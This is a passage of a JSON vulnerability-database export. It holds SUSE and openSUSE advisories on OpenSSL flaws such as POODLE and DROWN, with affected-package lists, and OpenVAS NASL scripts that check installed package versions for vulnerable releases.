"libopenssl1_0_0-1.0.1g-0.22.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Security Module", "OSVersion": "11.3", "packageVersion": "1.0.1g-0.22.1", "packageName": "openssl1", "packageFilename": "openssl1-1.0.1g-0.22.1.ppc64.rpm", "arch": "ppc64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Security Module", "OSVersion": "11.3", "packageVersion": "1.0.1g-0.22.1", "packageName": "openssl1", "packageFilename": "openssl1-1.0.1g-0.22.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Security Module", "OSVersion": "11.3", "packageVersion": "1.0.1g-0.22.1", "packageName": "openssl1", "packageFilename": "openssl1-1.0.1g-0.22.1.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Security Module", "OSVersion": "11.3", "packageVersion": "1.0.1g-0.22.1", "packageName": "libopenssl1_0_0", "packageFilename": "libopenssl1_0_0-1.0.1g-0.22.1.ppc64.rpm", "arch": "ppc64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Security Module", "OSVersion": "11.3", "packageVersion": "1.0.1g-0.22.1", "packageName": "libopenssl1_0_0-32bit", "packageFilename": "libopenssl1_0_0-32bit-1.0.1g-0.22.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Security Module", "OSVersion": "11.3", "packageVersion": "1.0.1g-0.22.1", "packageName": "openssl1", "packageFilename": "openssl1-1.0.1g-0.22.1.ia64.rpm", "arch": "ia64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Security Module", "OSVersion": "11.3", "packageVersion": "1.0.1g-0.22.1", "packageName": "libopenssl1_0_0", "packageFilename": "libopenssl1_0_0-1.0.1g-0.22.1.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Security Module", "OSVersion": "11.3", "packageVersion": "1.0.1g-0.22.1", "packageName": "libopenssl1-devel", "packageFilename": "libopenssl1-devel-1.0.1g-0.22.1.ppc64.rpm", "arch": "ppc64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Security Module", "OSVersion": "11.3", "packageVersion": "1.0.1g-0.22.1", "packageName": "libopenssl1_0_0-x86", "packageFilename": "libopenssl1_0_0-x86-1.0.1g-0.22.1.ia64.rpm", "arch": "ia64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Security Module", "OSVersion": "11.3", "packageVersion": "1.0.1g-0.22.1", "packageName": "openssl1-doc", "packageFilename": "openssl1-doc-1.0.1g-0.22.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Security Module", "OSVersion": "11.3", "packageVersion": "1.0.1g-0.22.1", "packageName": "libopenssl1_0_0", "packageFilename": "libopenssl1_0_0-1.0.1g-0.22.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Security Module", "OSVersion": "11.3", "packageVersion": "1.0.1g-0.22.1", "packageName": "libopenssl1-devel", "packageFilename": "libopenssl1-devel-1.0.1g-0.22.1.ia64.rpm", "arch": "ia64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Security Module", "OSVersion": "11.3", "packageVersion": "1.0.1g-0.22.1", "packageName": "openssl1-doc", "packageFilename": "openssl1-doc-1.0.1g-0.22.1.ppc64.rpm", "arch": "ppc64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Security Module", "OSVersion": "11.3", "packageVersion": "1.0.1g-0.22.1", "packageName": "libopenssl1-devel", "packageFilename": "libopenssl1-devel-1.0.1g-0.22.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Security Module", "OSVersion": "11.3", "packageVersion": "1.0.1g-0.22.1", "packageName": "libopenssl1-devel", "packageFilename": "libopenssl1-devel-1.0.1g-0.22.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Security Module", "OSVersion": "11.3", "packageVersion": "1.0.1g-0.22.1", "packageName": "libopenssl1_0_0-32bit", "packageFilename": "libopenssl1_0_0-32bit-1.0.1g-0.22.1.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Security Module", "OSVersion": "11.3", "packageVersion": "1.0.1g-0.22.1", "packageName": "libopenssl1_0_0", "packageFilename": "libopenssl1_0_0-1.0.1g-0.22.1.ia64.rpm", "arch": "ia64", "operator": "lt"}], "description": "This OpenSSL update fixes the following issues:\n\n * SRTP Memory Leak (CVE-2014-3513)\n * Session Ticket Memory Leak (CVE-2014-3567)\n * Build option no-ssl3 is incomplete (CVE-2014-3568)\n * Add support for TLS_FALLBACK_SCSV to mitigate CVE-2014-3566 (POODLE)\n\n Security Issues:\n\n * CVE-2014-3513\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3513\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3513</a>>\n * CVE-2014-3567\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3567\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3567</a>>\n * CVE-2014-3566\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566</a>>\n * CVE-2014-3568\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3568\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3568</a>>\n", "edition": 1, "reporter": "Suse", "published": "2014-11-04T23:04:45", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "type": "suse", "title": "Security update for openssl1 (important)", "bulletinFamily": "unix", "cvelist": ["CVE-2014-3566", "CVE-2014-3513", "CVE-2014-3567", "CVE-2014-3568"], "modified": "2014-11-04T23:04:45", "id": "SUSE-SU-2014:1357-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2014-11/msg00001.html", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:32:46", "references": ["https://bugzilla.suse.com/968046", "https://bugzilla.suse.com/967787", "https://bugzilla.suse.com/963415", "https://bugzilla.suse.com/968048", "https://bugzilla.suse.com/968374", "https://bugzilla.suse.com/952871"], "affectedPackage": [{"OS": "openSUSE Leap", "OSVersion": "42.1", "packageVersion": "0.9.8zh-14.1", "packageName": "libopenssl0_9_8-32bit", "packageFilename": "libopenssl0_9_8-32bit-0.9.8zh-14.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE Leap", "OSVersion": "42.1", "packageVersion": "0.9.8zh-14.1", "packageName": "libopenssl0_9_8-debuginfo", "packageFilename": "libopenssl0_9_8-debuginfo-0.9.8zh-14.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "0.9.8zh-9.3.1", "packageName": "libopenssl0_9_8-debuginfo", "packageFilename": "libopenssl0_9_8-debuginfo-0.9.8zh-9.3.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "0.9.8zh-9.3.1", "packageName": "libopenssl0_9_8", "packageFilename": "libopenssl0_9_8-0.9.8zh-9.3.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "0.9.8zh-9.3.1", "packageName": "libopenssl0_9_8-debuginfo", "packageFilename": "libopenssl0_9_8-debuginfo-0.9.8zh-9.3.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "0.9.8zh-9.3.1", "packageName": "libopenssl0_9_8", "packageFilename": "libopenssl0_9_8-0.9.8zh-9.3.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE Leap", "OSVersion": "42.1", "packageVersion": "0.9.8zh-14.1", "packageName": "libopenssl0_9_8-debuginfo", "packageFilename": "libopenssl0_9_8-debuginfo-0.9.8zh-14.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "0.9.8zh-9.3.1", "packageName": "libopenssl0_9_8-32bit", "packageFilename": "libopenssl0_9_8-32bit-0.9.8zh-9.3.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE Leap", "OSVersion": "42.1", "packageVersion": "0.9.8zh-14.1", "packageName": "libopenssl0_9_8-debuginfo-32bit", "packageFilename": "libopenssl0_9_8-debuginfo-32bit-0.9.8zh-14.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "0.9.8zh-9.3.1", "packageName": "libopenssl0_9_8-debuginfo-32bit", "packageFilename": "libopenssl0_9_8-debuginfo-32bit-0.9.8zh-9.3.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE Leap", "OSVersion": "42.1", "packageVersion": "0.9.8zh-14.1", "packageName": "libopenssl0_9_8-debugsource", "packageFilename": "libopenssl0_9_8-debugsource-0.9.8zh-14.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE Leap", "OSVersion": "42.1", "packageVersion": "0.9.8zh-14.1", "packageName": "libopenssl0_9_8-debugsource", "packageFilename": "libopenssl0_9_8-debugsource-0.9.8zh-14.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE Leap", "OSVersion": "42.1", "packageVersion": "0.9.8zh-14.1", "packageName": "libopenssl0_9_8", "packageFilename": "libopenssl0_9_8-0.9.8zh-14.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "0.9.8zh-9.3.1", "packageName": "libopenssl0_9_8-debugsource", "packageFilename": "libopenssl0_9_8-debugsource-0.9.8zh-9.3.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "0.9.8zh-9.3.1", "packageName": "libopenssl0_9_8-debugsource", "packageFilename": "libopenssl0_9_8-debugsource-0.9.8zh-9.3.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE Leap", "OSVersion": "42.1", "packageVersion": "0.9.8zh-14.1", "packageName": "libopenssl0_9_8", "packageFilename": "libopenssl0_9_8-0.9.8zh-14.1.i586.rpm", "arch": "i586", "operator": "lt"}], "description": "This update for libopenssl0_9_8 fixes the following issues:\n\n - CVE-2016-0800 aka the "DROWN" attack (bsc#968046): OpenSSL was\n vulnerable to a cross-protocol attack that could lead to decryption of\n TLS sessions by using a server supporting SSLv2 and EXPORT cipher suites\n as a Bleichenbacher RSA padding oracle.\n\n This update changes the openssl library to:\n\n * Disable SSLv2 protocol support by default.\n\n This can be overridden by setting the environment variable\n "OPENSSL_ALLOW_SSL2" or by using SSL_CTX_clear_options using the\n SSL_OP_NO_SSLv2 flag.\n\n Note that various services and clients had already disabled SSL\n protocol 2 by default previously.\n\n * Disable all weak EXPORT ciphers by default. These can be reenabled if\n required by old legacy software using the environment variable\n "OPENSSL_ALLOW_EXPORT".\n\n - CVE-2016-0797 (bnc#968048): The BN_hex2bn() and BN_dec2bn() functions\n had a bug that could result in an attempt to de-reference a NULL pointer\n leading to crashes. This could have security consequences if these\n functions were ever called by user applications with large untrusted\n hex/decimal data. Also, internal usage of these functions in OpenSSL\n uses data from config files or application command line arguments. If\n user developed applications generated config file data based on\n untrusted data, then this could have had security consequences as well.\n\n - CVE-2016-0799 (bnc#968374) On many 64 bit systems, the internal fmtstr()\n and doapr_outch() functions could miscalculate the length of a string\n and attempt to access out-of-bounds memory locations. These problems\n could have enabled attacks where large amounts of untrusted data is\n passed to the BIO_*printf functions. If applications use these functions\n in this way then they could have been vulnerable. OpenSSL itself uses\n these functions when printing out human-readable dumps of ASN.1 data.\n Therefore applications that print this data could have been vulnerable\n if the data is from untrusted sources. OpenSSL command line applications\n could also have been vulnerable when they print out ASN.1 data, or if\n untrusted data is passed as command line arguments. Libssl is not\n considered directly vulnerable.\n\n\n - The package was updated to 0.9.8zh:\n * fixes many security vulnerabilities (not seperately listed):\n CVE-2015-3195, CVE-2015-1788, CVE-2015-1789, CVE-2015-1790,\n CVE-2015-1792, CVE-2015-1791, CVE-2015-0286, CVE-2015-0287,\n CVE-2015-0289, CVE-2015-0293, CVE-2015-0209, CVE-2015-0288,\n CVE-2014-3571, CVE-2014-3569, CVE-2014-3572, CVE-2015-0204,\n CVE-2014-8275, CVE-2014-3570, CVE-2014-3567, CVE-2014-3568,\n CVE-2014-3566, CVE-2014-3510, CVE-2014-3507, CVE-2014-3506,\n CVE-2014-3505, CVE-2014-3508, CVE-2014-0224, CVE-2014-0221,\n CVE-2014-0195, CVE-2014-3470, CVE-2014-0076, CVE-2013-0169,\n CVE-2013-0166\n\n - avoid running OPENSSL_config twice. This avoids breaking engine loading.\n (boo#952871, boo#967787)\n\n - fix CVE-2015-3197 (boo#963415)\n * SSLv2 doesn't block disabled ciphers\n\n", "edition": 1, "reporter": "Suse", "published": "2016-03-03T14:11:44", "enchantments": {"score": {"vector": "NONE", "value": 4.3}}, "type": "suse", "title": "Security update for libopenssl0_9_8 (important)", "bulletinFamily": "unix", "cvelist": ["CVE-2013-0166", "CVE-2014-3505", "CVE-2014-3508", "CVE-2015-1792", "CVE-2014-3566", "CVE-2015-3197", "CVE-2014-3572", "CVE-2015-1789", "CVE-2013-0169", "CVE-2015-0286", "CVE-2014-3507", "CVE-2015-3195", "CVE-2014-3571", "CVE-2014-0076", "CVE-2016-0799", "CVE-2015-0288", "CVE-2014-0224", "CVE-2014-8275", "CVE-2016-0797", "CVE-2014-3570", "CVE-2014-3470", "CVE-2014-3506", "CVE-2015-0293", "CVE-2015-1788", "CVE-2014-0195", "CVE-2015-0209", "CVE-2014-3567", "CVE-2015-0204", "CVE-2016-0800", "CVE-2015-1790", "CVE-2014-3510", "CVE-2015-0287", "CVE-2015-0289", "CVE-2014-3568", "CVE-2014-3569", "CVE-2015-1791", "CVE-2014-0221"], "modified": "2016-03-03T14:11:44", "id": "OPENSUSE-SU-2016:0640-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-03/msg00011.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "openvas": [{"lastseen": "2017-07-26T08:48:58", "references": ["https://lists.fedoraproject.org/pipermail/package-announce/2014-November/143133.html", "2014-14234"], "pluginID": "1361412562310868467", "description": "Check the version of libetpan", "edition": 3, "reporter": "Copyright (C) 2014 Greenbone Networks GmbH", "published": "2014-11-11T00:00:00", "title": "Fedora Update for libetpan FEDORA-2014-14234", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Fedora Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-3566"], "modified": "2017-07-11T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310868467", "id": "OPENVAS:1361412562310868467", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for libetpan FEDORA-2014-14234\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.868467\");\n script_version(\"$Revision: 6663 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-11 11:58:05 +0200 (Tue, 11 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2014-11-11 06:21:21 +0100 (Tue, 11 Nov 2014)\");\n script_cve_id(\"CVE-2014-3566\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_name(\"Fedora Update for libetpan FEDORA-2014-14234\");\n script_tag(name: \"summary\", value: \"Check the version of libetpan\");\n script_tag(name: \"vuldetect\", value: \"Get the installed version with the help of detect NVT and check if the version is vulnerable or not.\");\n script_tag(name: \"insight\", value: \"The purpose of this mail library is to provide a portable, efficient middle-ware\nfor different kinds of mail access. When using the drivers interface, the\ninterface is the same for all kinds of mail access, remote and local mailboxes.\n\");\n script_tag(name: \"affected\", value: \"libetpan on Fedora 20\");\n script_tag(name: \"solution\", value: \"Please Install the Updated Packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name: \"FEDORA\", value: \"2014-14234\");\n script_xref(name: \"URL\" , value: \"https://lists.fedoraproject.org/pipermail/package-announce/2014-November/143133.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC20\")\n{\n\n if ((res = isrpmvuln(pkg:\"libetpan\", rpm:\"libetpan~1.6~1.fc20\", rls:\"FC20\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-07-24T12:54:51", "references": ["http://www.debian.org/security/2016/dsa-3489.html"], "pluginID": "703489", "description": "lighttpd, a small webserver, is vulnerable to the POODLE attack via\nthe use of SSLv3. This protocol is now disabled by default.", "edition": 2, "reporter": "Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net", "published": "2016-03-08T00:00:00", "title": "Debian Security Advisory DSA 3489-1 (lighttpd - security update)", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "Debian Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-3566"], "modified": "2017-07-07T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=703489", "id": "OPENVAS:703489", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3489.nasl 6608 2017-07-07 12:05:05Z cfischer $\n# Auto-generated from advisory DSA 3489-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\n\nif(description)\n{\n script_id(703489);\n script_version(\"$Revision: 6608 $\");\n script_cve_id(\"CVE-2014-3566\");\n script_name(\"Debian Security Advisory DSA 3489-1 (lighttpd - security update)\");\n script_tag(name: \"last_modification\", value: \"$Date: 2017-07-07 14:05:05 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2016-03-08 12:37:55 +0530 (Tue, 08 Mar 2016)\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_tag(name: \"solution_type\", value: \"VendorFix\");\n script_tag(name: \"qod_type\", value: \"package\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2016/dsa-3489.html\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: \"lighttpd on Debian Linux\");\n script_tag(name: \"insight\", value: \"lighttpd is a small webserver and fast webserver developed with\nsecurity in mind and a lot of features.\nIt has support for\n\n* CGI, FastCGI and SSI\n* virtual hosts\n* URL rewriting\n* authentication (plain files, htpasswd, LDAP)\n* transparent content compression\n* conditional configuration\n\nand configuration is straight-forward and easy.\");\n script_tag(name: \"solution\", value: \"For the oldstable distribution (wheezy), this problem has been fixed\nin version 1.4.31-4+deb7u4.\n\nWe recommend that you upgrade your lighttpd packages.\");\n script_tag(name: \"summary\", value: \"lighttpd, a small webserver, is vulnerable to the POODLE attack via\nthe use of SSLv3. This protocol is now disabled by default.\");\n script_tag(name: \"vuldetect\", value: \"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"lighttpd\", ver:\"1.4.31-4+deb7u4\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"lighttpd-doc\", ver:\"1.4.31-4+deb7u4\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"lighttpd-mod-cml\", ver:\"1.4.31-4+deb7u4\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"lighttpd-mod-magnet\", ver:\"1.4.31-4+deb7u4\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"lighttpd-mod-mysql-vhost\", ver:\"1.4.31-4+deb7u4\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"lighttpd-mod-trigger-b4-dl\", ver:\"1.4.31-4+deb7u4\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"lighttpd-mod-webdav\", ver:\"1.4.31-4+deb7u4\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-04-30T14:06:51", "references": ["http://www.ubuntu.com/usn/usn-2839-1/", "2839-1"], "pluginID": "1361412562310842563", "description": "Check the version of cups", "edition": 5, "reporter": "Copyright (C) 2015 Greenbone Networks GmbH", "published": "2015-12-17T00:00:00", "title": "Ubuntu Update for cups USN-2839-1", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Ubuntu Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-3566"], "modified": "2018-04-27T00:00:00", "id": "OPENVAS:1361412562310842563", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310842563", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for cups USN-2839-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.842563\");\n script_version(\"$Revision: 9652 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-27 11:09:48 +0200 (Fri, 27 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2015-12-17 05:09:00 +0100 (Thu, 17 Dec 2015)\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_cve_id(\"CVE-2014-3566\");\n script_name(\"Ubuntu Update for cups USN-2839-1\");\n script_tag(name: \"summary\", value: \"Check the version of cups\");\n script_tag(name: \"vuldetect\", value: \"Checks if a vulnerable version is present on the target host.\");\n script_tag(name: \"insight\", value: \"As a security improvement against the\nPOODLE attack, this update disables SSLv3 support in the CUPS web interface.\n\nFor legacy environments where SSLv3 support is still required, it can be\nre-enabled by adding 'SSLOptions AllowSSL3' to /etc/cups/cupsd.conf.\");\n script_tag(name: \"affected\", value: \"cups on Ubuntu 14.04 LTS\");\n script_tag(name: \"solution\", value: \"Please Install the Updated Packages.\");\n script_xref(name: \"USN\", value: \"2839-1\");\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-2839-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU14\\.04 LTS\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"cups\", ver:\"1.7.2-0ubuntu1.7\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-07-25T10:53:24", "references": ["https://lists.fedoraproject.org/pipermail/package-announce/2015-January/147484.html", "2014-14237"], "pluginID": "1361412562310868770", "description": "Check the version of claws-mail", "edition": 3, "reporter": "Copyright (C) 2015 Greenbone Networks GmbH", "published": "2015-01-05T00:00:00", "title": "Fedora Update for claws-mail FEDORA-2014-14237", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Fedora Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-3566"], "modified": "2017-07-10T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310868770", "id": "OPENVAS:1361412562310868770", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for claws-mail FEDORA-2014-14237\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.868770\");\n script_version(\"$Revision: 6630 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:34:32 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2015-01-05 14:50:50 +0100 (Mon, 05 Jan 2015)\");\n script_cve_id(\"CVE-2014-3566\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_name(\"Fedora Update for claws-mail FEDORA-2014-14237\");\n script_tag(name: \"summary\", value: \"Check the version of claws-mail\");\n script_tag(name: \"vuldetect\", value: \"Get the installed version with the help of detect NVT and check if the version is vulnerable or not.\");\n script_tag(name: 